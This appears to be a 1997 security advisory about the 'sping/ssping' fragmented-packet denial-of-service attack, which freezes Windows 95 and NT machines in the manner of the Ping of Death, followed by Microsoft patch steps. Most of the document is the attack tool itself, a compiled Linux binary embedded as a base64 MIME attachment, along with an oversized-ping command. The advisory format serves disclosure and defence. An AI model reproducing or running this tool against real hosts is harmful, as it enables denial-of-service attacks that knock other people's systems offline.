COMMAND
(s)ping
SYSTEMS AFFECTED
Win '95, NT, and OSR2/3
PROBLEM
When you run the program called sping, it will send an oversized
packet (ping -l 65510 ip) to the destined IP and cause the win95
machine to freeze (and NT). Credit goes to fATE 1997 BABY.
SSPING was a product of Datagram of Havok, or so it was thought.
Jeff W. Robertson has come forward on BugTraq with his original
source code however which details this. How it seems to work is
it sends the Win95/NT target a series of fragmented IP packets to
machine, and when the machine puts them together, it then becomes
a large packet (>64k?), which resembles the classic Ping of Death
attack (ICMP packets > 64K), and then it freezes completely.
See for more details:
http://www.darkening.com/ssping/
Below is included the binary to sping.
---171113654-1145381486-867531838=:19197
Content-Type: APPLICATION/octet-stream; name=sping
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.95.970628170358.19197E@discover.laker.net>
Content-Description:
f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAMIYECDQAAABMDQAAAAAAADQAIAAF
ACgAFwAUAAYAAAA0AAAANIAECDSABAigAAAAoAAAAAUAAAAEAAAAAwAAANQA
AADUgAQI1IAECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIQgsA
AEILAAAFAAAAABAAAAEAAABICwAASJsECEibBAjoAAAAQAEAAAYAAAAAEAAA
AgAAAKgLAAComwQIqJsECIgAAACIAAAABgAAAAQAAAAvbGliL2xkLWxpbnV4
LnNvLjEAABEAAAAdAAAAEQAAABoAAAAWAAAAAAAAAAwAAAAPAAAAEgAAAAAA
AAATAAAACAAAAAEAAAAYAAAAAAAAABcAAAALAAAAFAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABwAAAAMAAAAZAAAA
CQAAAAAAAAAAAAAAAAAAABAAAAAKAAAABgAAAAAAAAAFAAAAFQAAABwAAAAb
AAAAAgAAAA4AAAAAAAAADQAAAAAAAAAAAAAAAAAAAAAAAAALAAAAKIUECCgA
AAAiAAAAEgAAAKibBAgAAAAAEQDx/xsAAAAwnAQIVAAAABEAEQAnAAAAOIUE
CAAAAAAiAAAALgAAAEiFBAhmAAAAEgAAADUAAABImwQIBAAAABEADAA/AAAA
WIUECDYAAAASAAAARQAAABCFBAgAAAAAEgAHAEsAAABohQQIRgAAABIAAABX
AAAASJsECAQAAAAgAAwAXwAAAHiFBAgAAAAAIgAAAGcAAACIhQQIOQAAABIA
AABxAAAAmIUECHcAAAASAAAAfAAAAIScBAgCAAAAEQARAIoAAACohQQIiAAA
ABIAAACRAAAAuIUECJYAAAASAAAAlwAAAMiFBAhDAAAAEgAAAKEAAADYhQQI
kAQAABIAAACvAAAA4IoECAAAAAASAAoAtQAAAOiFBAg4AAAAEgAAALwAAABc
mwQIAAAAABEA8f/SAAAA+IUECA0AAAAiAAAA2AAAAAiGBAigAAAAEgAAAN0A
AAAYhgQIPgAAABIAAADoAAAA1IoECAAAAAARAPH/7wAAADCcBAgAAAAAEQDx
//YAAAAwnAQIAAAAABEA8f8CAQAAiJwECAAAAAARAPH/AGxpYmMuc28uNQBw
cmludGYAX0RZTkFNSUMAX0lPX3N0ZGVycl8AcGVycm9yAHNvY2tldABfX2Vu
dmlyb24AYnplcm8AX2luaXQAX19saWJjX2luaXQAZW52aXJvbgBmcHJpbnRm
AGluZXRfYWRkcgBzZXRzb2Nrb3B0AF9fZnB1X2NvbnRyb2wAc2VuZHRvAGJj
b3B5AGluZXRfbnRvYQBnZXRob3N0YnluYW1lAF9maW5pAGF0ZXhpdABfR0xP
QkFMX09GRlNFVF9UQUJMRV8AaHRvbnMAZXhpdABfX3NldGZwdWN3AF9ldGV4
dABfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZAAAMJwECAUDAACEnAQIBQ4AAGib
BAgHAQAAbJsECAcEAABwmwQIBwUAAHSbBAgHBwAAeJsECAcJAAB8mwQIBwsA
AICbBAgHDAAAhJsECAcNAACImwQIBw8AAIybBAgHEAAAkJsECAcRAACUmwQI
BxIAAJibBAgHFAAAnJsECAcWAACgmwQIBxcAAKSbBAgHGAAA6JsFAADCAAD/
NWCbBAj/JWSbBAgAAAAA/yVomwQIaAAAAADp4P////8lbJsECGgIAAAA6dD/
////JXCbBAhoEAAAAOnA/////yV0mwQIaBgAAADpsP////8leJsECGggAAAA
6aD/////JXybBAhoKAAAAOmQ/////yWAmwQIaDAAAADpgP////8lhJsECGg4
AAAA6XD/////JYibBAhoQAAAAOlg/////yWMmwQIaEgAAADpUP////8lkJsE
CGhQAAAA6UD/////JZSbBAhoWAAAAOkw/////yWYmwQIaGAAAADpIP////8l
nJsECGhoAAAA6RD/////JaCbBAhocAAAAOkA/////yWkmwQIaHgAAADp8P7/
/wAAAAAAAAAAWYnjieCJygHSAdIB0IPABDHtVVVVieVQU1G4iAAAALsAAAAA
zYCLRCQIo0ibBAgPtwWEnAQIUOis////g8QE6PT+//9o4IoECOhq////g8QE
6Ir+///oVQAAAFDod////1uNtCYAAAAAjbQmAAAAALgBAAAAzYDr9420JgAA
AABTu1ibBAiDPVibBAgAdA2QiwP/0IPDBIM7AHX0W8ONNsOQkJCQkJCQkJCQ
kJCQkJBVieWB7LgBAABTjZ1s/v//iZ1o/v//i51o/v//g8MUiZ1k/v//x4VI
/v//AQAAAGiQAQAAjYVs/v//UOg4/v//g8QIagFqA2oC6Br+//+DxAyJwIlF
/IN9/AB9JGjoigQI6PL9//+DxARqAei4/v//g8QEjbYAAAAAjbQmAAAAAGoE
jYVI/v//UGoDagCLRfxQ6CL+//+DxBSJwIXAfSFo74oECOiv/f//g8QEagHo
df7//4PEBI12AI20JgAAAACDfQgCdCqLRQyLEFJo+ooECGgwnAQI6L39//+D
xAxqAehD/v//g8QEkI20JgAAAACLRQyDwASLEFLo+v3//4PEBInAiYVg/v//
g71g/v//AHVei0UMg8AEixBS6Ij9//+DxASJwIuVaP7//4nAiUIQg/j/dSuL
RQyDwASLEFJoDosECGgwnAQI6Ev9//+DxAxqAejR/f//g8QEjbYAAAAA6zaN
tCYAAAAAjbQmAAAAAIuFYP7//4tQDFKLhWj+//+DwBBQi4Vg/v//i1AQiwJQ
6EP9//+DxAyLhWj+//+LUBBS6EH9//+DxASJwFBoIIsECOiR/P//g8QIi4Vo
/v//gCAPgAhAi4Vo/v//gCDwgAgFi4Vo/v//xkABAGiQAQAA6DL9//+DxASJ
wIuVaP7//2aJQgJo4RAAAOgZ/f//g8QEicCLlWj+//9miUIEagDoA/3//4PE
BInAi5Vo/v//ZolCBouFaP7//8ZACP+LhWj+///GQAkBi4Vo/v//ZsdACgAA
i4Vo/v//x0AMAAAAAIuFaP7//4tQEImVVP7//2bHhVD+//8CAIuFZP7//8YA
CIuFZP7//8ZAAQBo//cAAOiS/P//g8QEicCLlWT+//9miUICx4VM/v//AAAA
AIG9TP7/////AAB+BekAAQAAi4VM/v//wfgDD7fQUuhW/P//g8QEicCLlWj+
//9miUIGgb1M/v//X/4AAH8zaAAgAADoMfz//4PEBInAi5Vo/v//i41o/v//
ZotZBmYJw2aJWgbrJI10JgCNtCYAAAAAaOgDAADo/vv//4PEBInAi5Vo/v//
ZolCAmoQjYVQ/v//UGoAaJABAACNhWz+//9Qi0X8UOh/+///g8QYicCFwH0m
i4VM/v//UGgviwQIaDCcBAjoMPv//4PEDGg7iwQI6OP6//+DxASDvUz+//8A
dR+LhWT+///GAACLhWT+///GQAEAi4Vk/v//ZsdAAgAAgYVM/v//fAEAAOnw
/v//kDHA6wyNtgAAAACNtgAAAACLnUT+//+J7F3DkJCQkJCQU7tMmwQIgz1M
mwQI/3QNkIsD/9CDw/yDO/919FvDjTbDkJCQAAAAAAAAAAAAAAAA6Mv7///C
AABzb2NrZXQASVBfSERSSU5DTAB1c2FnZTogJXMgaG9zdG5hbWUKACVzOiB1
bmtub3duIGhvc3QKAFNlbmRpbmcgdG8gJXMKAG9mZnNldCAlZDogAHNlbmR0
bwAAAAAAAAAAAAAA/////wAAAAD/////AAAAAKibBAgAAAAAAAAAAC6FBAg+
hQQIToUECF6FBAhuhQQIfoUECI6FBAiehQQIroUECL6FBAjOhQQI3oUECO6F
BAj+hQQIDoYECB6GBAgBAAAAAQAAAAwAAAAQhQQIDQAAAOCKBAgEAAAA6IAE
CAUAAAB4gwQIBgAAAKiBBAgKAAAABwEAAAsAAAAQAAAAFQAAAAAAAAADAAAA
XJsECAIAAACAAAAAFAAAABEAAAAXAAAAkIQECBEAAACAhAQIEgAAABAAAAAT
AAAACAAAAAAAAAAAAAAAAEdDQzogKEdOVSkgMi43LjIubC4zAABHQ0M6IChH
TlUpIDIuNy4yLjEAAEdDQzogKEdOVSkgMi43LjIubC4zAAgAAAAAAAAAAQAA
ADAxLjAxAAAACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAAAAAAAAEAAAAwMS4w
MQAAAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gA
LmR5bnN5bQAuZHluc3RyAC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQA
LnRleHQALmZpbmkALnJvZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QA
LmR5bmFtaWMALmJzcwAuY29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAAT
AAAAAAAAAAAAAAABAAAAAAAAACMAAAAFAAAAAgAAAOiABAjoAAAAwAAAAAMA
AAAAAAAABAAAAAQAAAApAAAACwAAAAIAAACogQQIqAEAANABAAAEAAAAAQAA
AAQAAAAQAAAAMQAAAAMAAAACAAAAeIMECHgDAAAHAQAAAAAAAAAAAAABAAAA
AAAAADkAAAAJAAAAAgAAAICEBAiABAAAEAAAAAMAAAARAAAABAAAAAgAAABC
AAAACQAAAAIAAACQhAQIkAQAAIAAAAADAAAACAAAAAQAAAAIAAAASwAAAAEA
AAAGAAAAEIUECBAFAAAIAAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAA
ABiFBAgYBQAAEAEAAAAAAAAAAAAABAAAAAQAAABWAAAAAQAAAAYAAAAwhgQI
MAYAAKQEAAAAAAAAAAAAABAAAAAAAAAAXAAAAAEAAAAGAAAA4IoECOAKAAAI
AAAAAAAAAAAAAAAQAAAAAAAAAGIAAAABAAAAAgAAAOiKBAjoCgAAWgAAAAAA
AAAAAAAAAQAAAAAAAABqAAAAAQAAAAMAAABImwQISAsAAAQAAAAAAAAAAAAA
AAQAAAAAAAAAcAAAAAEAAAADAAAATJsECEwLAAAIAAAAAAAAAAAAAAAEAAAA
AAAAAHcAAAABAAAAAwAAAFSbBAhUCwAACAAAAAAAAAAAAAAABAAAAAAAAAB+
AAAAAQAAAAMAAABcmwQIXAsAAEwAAAAAAAAAAAAAAAQAAAAEAAAAgwAAAAYA
AAADAAAAqJsECKgLAACIAAAABAAAAAAAAAAEAAAACAAAAIwAAAAIAAAAAwAA
ADCcBAgwDAAAWAAAAAAAAAAAAAAACAAAAAAAAACRAAAAAQAAAAAAAAAAAAAA
MAwAAEAAAAAAAAAAAAAAAAEAAAAAAAAAmgAAAAcAAAAAAAAAQAAAAHAMAAA8
AAAAAAAAAAAAAAABAAAAAAAAABEAAAADAAAAAAAAAAAAAACsDAAAoAAAAAAA
AAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAA5BAAAIAEAAAWAAAAKQAA
AAQAAAAQAAAACQAAAAMAAAAAAAAAAAAAAGQVAADRAQAAAAAAAAAAAAABAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAEAAAAAAAAAAAAA
AAAAAwACAAAAAAAAAAAAAAAAAAMAAwAAAAAAAAAAAAAAAAADAAQAAAAAAAAA
AAAAAAAAAwAFAAAAAAAAAAAAAAAAAAMABgAAAAAAAAAAAAAAAAADAAcAAAAA
AAAAAAAAAAAAAwAIAAAAAAAAAAAAAAAAAAMACQAAAAAAAAAAAAAAAAADAAoA
AAAAAAAAAAAAAAAAAwALAAAAAAAAAAAAAAAAAAMADAAAAAAAAAAAAAAAAAAD
AA0AAAAAAAAAAAAAAAAAAwAOAAAAAAAAAAAAAAAAAAMADwAAAAAAAAAAAAAA
AAADABAAAAAAAAAAAAAAAAAAAwARAAAAAAAAAAAAAAAAAAMAEgAAAAAAAAAA
AAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAA
AAAAAAAAAAADABYAAQAAAAAAAAAAAAAABADx/wwAAACwigQIAAAAAAAACQAb
AAAAsIoECAAAAAACAAkAMQAAAFCbBAgAAAAAAQANAD4AAADQigQIAAAAAAIA
CQBJAAAATJsECAAAAAABAAwAVwAAAFibBAgAAAAAAQAOAGQAAAAAAAAAAAAA
AAQA8f9rAAAAoIYECAAAAAAAAAkAAQAAAAAAAAAAAAAABADx/wwAAACwhgQI
AAAAAAAACQBwAAAAsIYECAAAAAACAAkAhgAAAFSbBAgAAAAAAQAOAJQAAADQ
hgQIAAAAAAIACQBJAAAATJsECAAAAAABAAwAnwAAAEybBAgAAAAAAQANAK0A
AAAAAAAAAAAAAAQA8f8MAAAA4IYECAAAAAAAAAkAugAAACiFBAgoAAAAIgAA
AMEAAAComwQIAAAAABEA8f/KAAAA1IoECAAAAAARAPH/0QAAADCcBAhUAAAA
EQARAN0AAAA4hQQIAAAAACIAAADkAAAASIUECGYAAAASAAAA6wAAAEibBAgE
AAAAEQAMAPUAAABYhQQINgAAABIAAAD7AAAAEIUECAAAAAASAAcAAQEAAGiF
BAhGAAAAEgAAAA0BAABImwQIBAAAACAADAAVAQAAeIUECAAAAAAiAAAAHQEA
AIiFBAg5AAAAEgAAACcBAACYhQQIdwAAABIAAAAyAQAAhJwECAIAAAARABEA
QAEAADCGBAiAAAAAEgAJAEcBAACohQQIiAAAABIAAABOAQAAMIYECAAAAAAQ
AAkAXQEAALiFBAiWAAAAEgAAAGMBAAAwnAQIAAAAABEA8f9vAQAA4IYECMoD
AAASAAkAdAEAAMiFBAhDAAAAEgAAAH4BAADYhQQIkAQAABIAAACMAQAA4IoE
CAAAAAASAAoAkgEAAOiFBAg4AAAAEgAAAJkBAAAwnAQIAAAAABEA8f+gAQAA
XJsECAAAAAARAPH/tgEAAIicBAgAAAAAEQDx/7sBAAD4hQQIDQAAACIAAADB
AQAACIYECKAAAAASAAAAxgEAABiGBAg+AAAAEgAAAABjcnRzdHVmZi5jAGdj
YzJfY29tcGlsZWQuAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABfX0NUT1JfRU5E
X18AaW5pdF9kdW1teQBmb3JjZV90b19kYXRhAF9fRFRPUl9FTkRfXwBjcnQw
LlMAZG9uZQBfX2RvX2dsb2JhbF9kdG9yc19hdXgAX19EVE9SX0xJU1RfXwBm
aW5pX2R1bW15AF9fQ1RPUl9MSVNUX18AcGluZy1saW51eC5jAHByaW50ZgBf
RFlOQU1JQwBfZXRleHQAX0lPX3N0ZGVycl8AcGVycm9yAHNvY2tldABfX2Vu
dmlyb24AYnplcm8AX2luaXQAX19saWJjX2luaXQAZW52aXJvbgBmcHJpbnRm
AGluZXRfYWRkcgBzZXRzb2Nrb3B0AF9fZnB1X2NvbnRyb2wAX3N0YXJ0AHNl
bmR0bwBfX19jcnRfZHVtbXlfXwBiY29weQBfX2Jzc19zdGFydABtYWluAGlu
ZXRfbnRvYQBnZXRob3N0YnluYW1lAF9maW5pAGF0ZXhpdABfZWRhdGEAX0dM
T0JBTF9PRkZTRVRfVEFCTEVfAF9lbmQAaHRvbnMAZXhpdABfX3NldGZwdWN3
AA==
---171113654-1145381486-867531838=:19197--
SOLUTION
Microsoft claim it affects IIS boxes, but obviously it can affect
any NT/Win95 box exposed to the Internet that does not block ICMP
packets. It has become the custom to block ICMP at routers or
Firewalls and not allow such traffic through to servers
themselves, but many have not made the necessary changes.
For fix note that service pack 3 must be applied to Windows NT
4.0 prior to applying this fix. This hotfix has been posted to
the following Internet location:
ftp://ftp.microsoft.com
with path
/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/icmp-fix
For Windows 95 this issue is resolved by the following updated
file for Windows 95 and OSR2:
VIP.386 version 4.0.956 (6/30/97) and later
This file is included in the self-extracting VIPUPD.EXE file. To
install this update, follow these steps (according to MS
advisory):
1. Download the VIPUPD.EXE file from the online service listed
below to an empty folder.
2. In My Computer or Windows Explorer, double-click the
VIPUPD.EXE file you downloaded in step 1.
3. Follow the instructions on the screen.
The following file(s) are available for download from the
Microsoft Software Library:
~ VIPUPD.EXE